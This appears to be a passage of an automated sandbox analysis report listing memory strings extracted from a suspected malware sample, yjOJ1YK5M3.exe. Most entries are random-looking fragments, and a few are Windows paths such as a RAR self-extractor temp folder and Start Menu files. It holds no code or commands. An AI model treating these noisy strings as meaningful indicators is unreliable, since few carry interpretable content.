          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: loinubjmemstr_4f961c78-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i1w1rmemstr_0c1a93eb-1
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ai8bcmemstr_1b213c35-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6?sm,bmemstr_92a04ee4-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @$knfmemstr_377ae3e7-2
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8ov4|memstr_5f603e70-d
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @63gkmemstr_9c86c41e-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ptkxememstr_67fbef8a-d
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pyfasmemstr_1c9e57ac-6
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v4mnwmemstr_cd9f08d9-0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w9dxsmemstr_8794f523-1
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c1cv0memstr_cf937345-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wit#!memstr_398269b8-4
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y6ts'memstr_6bc19508-9
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +ug;%memstr_52ebd3a9-6
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x86yfbsmemstr_3148c5b1-a
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )bb0ememstr_8986ec1c-8
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: b( ucmemstr_4ce53e03-1
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j9lvcmemstr_e67b29d9-4
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -yof0memstr_41023306-c
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a3jg2memstr_fc900f2e-b
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ictbh8memstr_76d6f21b-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !b23wrmemstr_e1bde047-8
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: jsu0exmemstr_9241e88f-d
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0gazmmemstr_8b873323-2
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d]'o1memstr_6829d977-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %77fcmemstr_db9abd38-3
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j$xj(memstr_e783c1ce-a
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c5pfcmemstr_2d0b2b21-3
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;_qmtcmemstr_de63a68d-4
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ec18imemstr_45df6ac4-3
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: }8adsmemstr_c8f1f27f-d
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rsqo5memstr_e2a8ca00-6
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uo3y3memstr_b9d89f35-a
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3qpg@.memstr_56c37485-0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wrup@memstr_ccbf0121-8
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 87rdmemstr_f574bbd1-8
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fx3b79nmemstr_532428d5-4
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: jtttymemstr_ede69665-3
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q844uimemstr_81890f7f-2
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ab72d4amemstr_9c31d2da-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fzp@<memstr_514b19e5-b
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _['b!umemstr_47880701-6
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7f7xk2memstr_6937e6ba-9
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h1r3csmemstr_f73e70aa-1
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8k2r8memstr_55538d8f-6
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bfh0k0memstr_655e3b8b-5
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: df93ljmemstr_78692979-b
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _j4ydmemstr_296ac371-2
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dj7pymemstr_6fa87cdb-1
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sxxz2p5lmemstr_fea0c809-4
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9o6nod6memstr_78597ea1-d
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q6x64memstr_c0b42954-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4qx4jmemstr_862330aa-8
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q2qzk8m5memstr_6a1bb57d-d
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4no6fmemstr_2533696c-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #j@!jmemstr_8c4bc1f6-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (o1ldiymemstr_1c683ca6-c
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k0gs(o1ldiymemstr_e7ad6b1c-6
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rywa7gmemstr_c8d6a85c-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u4fcg7memstr_6e7e075d-1
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qgmvmemstr_2d2bc9c4-3
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x49m;qmemstr_4d78f8f0-1
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wdd7rmemstr_a2c45b07-0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tm5k@<memstr_18a3e596-b
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =v8mmf9xmemstr_a11fdd55-6
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 95bd4dememstr_b6e635f9-3
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fgrlntmemstr_8ef2d42a-b
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7f36hmemstr_a6c2e15b-0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6qr55b1memstr_c811cbf7-5
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fpr7my1memstr_61531bc7-2
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ni9n7memstr_ec03ce06-5
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: htfy0memstr_658cd0b6-9
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xwrwkfbmemstr_abd20f1b-4
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f9ha4memstr_982bd2da-d
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +t6numemstr_aba45e1b-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vb9ommemstr_54487acf-a
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sw50amemstr_0788f74c-0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2mok9memstr_7348c9c6-c
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: go5fymemstr_4b4d3c2a-4
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hlsism60memstr_c2e01c17-3
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h)pkz4memstr_a25fd297-b
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dy+_xmemstr_f25a790c-d
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r&p5qwmemstr_d3bdf5ce-7
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w9b5memstr_59581ffd-5
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ulc65memstr_33f6f0c8-b
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bwvlk8zjmemstr_d061d7a8-d
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g4g4memstr_8ac367d8-9
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cno8btmemstr_839a0efa-7
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wuc9memstr_6da8e70c-5
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :)la44memstr_579d2826-4
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xf9ehmemstr_2d95880a-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: snnkgmemstr_56279450-1
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0snnkgmemstr_deb0010e-0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t1xrc5memstr_98b21090-b
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p}&p0domemstr_9d99db13-9
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hot4ememstr_b255edbc-4
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wstvjmemstr_a2795720-c
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p&bphs7memstr_859bab14-b
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ngbo1memstr_184201cb-d
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v3w7gsmemstr_b40e75ac-0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ou20immemstr_b22b19a4-6
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 'dhupmemstr_2b341c78-5
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j6mcb9memstr_11c3314e-2
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dyf5g5memstr_ff2647ae-4
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5xk3uj0memstr_abc78456-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #_f98umemstr_e2ed01bc-7
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5qp2rmemstr_5bfa42f0-5
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zjullmemstr_2ad77097-c
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2p1tmemstr_3b702cb6-c
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d0d8qmemstr_65f3ca7a-d
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j2kh!memstr_4f1a54e5-a
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qh6wz4memstr_b96355a3-8
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e3j8vmemstr_ca43b6d0-3
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6mpn[glmgmemstr_1878ba1e-b
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: suas7h7cmemstr_ece64bfa-7
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: z8dbhmemstr_21693ce0-2
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lpm5z8dbhmemstr_6aa121f0-7
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 40j2pmemstr_8f6b45e8-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &231w1memstr_025e0134-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 59i5smemstr_2db57fd9-5
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1pkz6pvlmemstr_052b9d4c-5
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vny4c4bmemstr_a3373e96-d
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p 3x49memstr_83407e1b-4
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: yq7t@memstr_0087e15e-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &q1z64k3memstr_d95de629-c
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )&q1z64k3memstr_4867afb3-0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g^j|xfmemstr_9eccf9e8-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mxa.nvmemstr_bf8dd80c-3
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hy3imemstr_5e7eecb7-3
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$,seu0memstr_e0f472ac-d
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d1rl(4brumemstr_2bbcb62c-0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vy0d7memstr_40767b1e-a
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <be4xmemstr_a9bc25a1-b
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,d9cmemstr_8b49b64e-a
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9, <^memstr_cff0357d-7
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q,8^=memstr_bd639ab0-0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8<$f;memstr_5910fd09-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9t$l}memstr_94945c3a-1
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7svj.memstr_aec28632-a
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: opd98memstr_42aaa417-3
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\local\temp\rarsfx0memstr_80f8dc55-f
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sers\user\appdata\local\temp\rarsfx0memstr_cf51c38b-7
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: emb@"memstr_6b2ffffd-6
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gwk&c[?memstr_5ec144eb-e
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u d.vmemstr_719b2609-b
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zneizcmemstr_a63a0e11-2
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .r0?zmemstr_2bbdf274-3
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c:\p1memstr_50887fdf-5
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: usersmemstr_3187c9a2-4
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: users<memstr_e580cf54-1
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .usersmemstr_af27b39a-2
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: jonesmemstr_da764447-3
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: user<memstr_87787e10-7
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .usermemstr_424a0ff1-1
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\accessibility\desktop.inimemstr_fab3cd7e-2
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c:\x1cw;^memstr_79a82f77-f
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: usersdmemstr_0ff7287a-a
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: users@shell32.dll,-21813memstr_e7f5fecb-c
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appdatamemstr_b2b3e67e-4
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appdata@memstr_b7c6f753-9
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localmemstr_89c5d46c-6
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local<memstr_a1bec88c-9
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %d4#!`````2h````````0a"````````4nmemstr_0bad0f0d-0
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u2it<memstr_761e2f4b-2
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs@shell32.dll,memstr_61939659-c
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: }d"pnmemstr_ff57ee25-1
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hj(5w<memstr_027c6f96-4
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: parseandcreateitemmemstr_43c27480-3
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: parseoriginalitemmemstr_99b4b439-c
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\desktop\memstr_c7beb648-3
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x-5o\memstr_cf22e83e-3
